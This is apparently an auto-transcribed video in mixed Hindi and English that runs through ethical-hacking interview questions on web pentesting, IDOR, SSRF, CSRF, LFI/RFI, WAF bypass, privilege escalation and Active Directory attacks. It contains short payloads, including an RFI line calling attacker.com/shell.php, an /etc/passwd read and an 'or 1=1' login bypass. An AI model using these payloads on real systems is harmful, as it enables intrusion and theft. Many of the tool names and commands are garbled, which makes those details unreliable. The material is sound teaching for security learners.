हेलो गाइस, इथिकल हैकिंग के इंटरव्यू क्वेश्चंस देखते हैं। हाउ डू यू परफॉर्म अ वेब एप्लीकेशन penetration test? Structure methodology will be reconnaissance, in which identify subdomains using tools like sublister, AMAS, check technologies using web analyzer, mapping the application like crawl using bug suit, identify endpoints, parameters, API. The next step will be vulnerability testing, test for SQL injection, XSR, IDOR, authentication for flaws. Example, modify request in pub repeater, change user ID and check access. Next step will be exploitation. Try real attack, extract DB data, bypass login. Next step will be reporting, include impact and CVSS score and remediation. What is IDOR? Insecure Direct Object Reference. IDOR occurs when application exposes object references without proper authorization. Example /get /API /user 123 change into get URL into API /URL /123p 1232 124. If data of another user is accessible, is IDOR. Real world testing, intercept request in bub suit, modify ID, observe response. Preparation should be proper authorization check, use indirect references like token. Explain SSRF, server side request forgery. SSRF allows attacker to make server send request internally. Example, https://website.com/face $URL http://internal server can access internal APIs, cloud metadata such as AWS IAM credential. Attacker scenario can be target fetch API, inject HTTP IP and latest metadata. Prevention should be whitelist URLs, block internal IP ranges. What is CSRF? Cross-site request forgery tricks user into performing actions. Example can be user log into bank, attacker sends malicious link and it transfers money. Testing can be capture request in bub suit, remove CSRF token, replay request if works vulnerable. Prevention should be CSRF token, same site cookies. How do you test authentication mechanism? It should be checklist should be brute force testing using Hydra, default credentials, admin, password policy, weak passwords are allowed or not, account lookout after failed attempts, JWT issues, tampering token. I test login bypass like or 1 equal to 1. What is web application firewall? How do you bypass it? Web application firewall filters malicious HTTP traffic. Bypass techniques can be encoding payloads using case variations, obfuscation. Example can be union select, bypass union /*/ select. Explain LFI and RFI. LFI means local file inclusion. It can be question mark page. It is can be query question mark page is equal to // etc passwd. RFI means remote file inclusion. It can be also a query question mark page is equal to http://attacker.com/shell.php. Impact, read sensitive files, remote code execution. What is command injection? Occurs when operating system commands are executed via input. Example ping 127 .0.0.1, yeah, or LAS. Testing can be add UMI prevention, input sanitization, avoid system calls. What is privilege escalation in Linux? Common methods can be SUID binaries, weak file permissions, cron jobs. Tools can be used lean peas, example find slash hyphen perm hyphen 4000. What is pivoting? Using compromised system to attack internal network. Example, compromised web server, use it as a access DB server. Tool can be used Metasploit. What is Active Directory attack? Targeting Windows domain environment. Common attacks can be pass the hash, Kerberos sting. Tools can be Mimicards. What is Kerberos sting? Extract service account hashes from ED. Steps can be request service ticket, extract hash, crack offline. What is pass the hash? Using hash instead of password. No need to crack password. What is DNS enumeration? Finding subdomain MX records. Tools can be used DNS enum. What is reverse proxy? Server that sits between client and backend. Used for load balancing security. What is exploitation framework? Tools used to automate attacks. Example, Metasploit. What is data exfiltration? Stealing data from system. Methods can be used DNS tunneling, HTTP transfer. What is buffer overflow? Memory overflow attack. Impact can be crash program, execute code. What is footprinting? Gathering target information before attack. Example, company employees IP ranges. What is ethical hacking? Ethical hacking with permission. Its goal are improve security and find vulnerabilities. Thank you.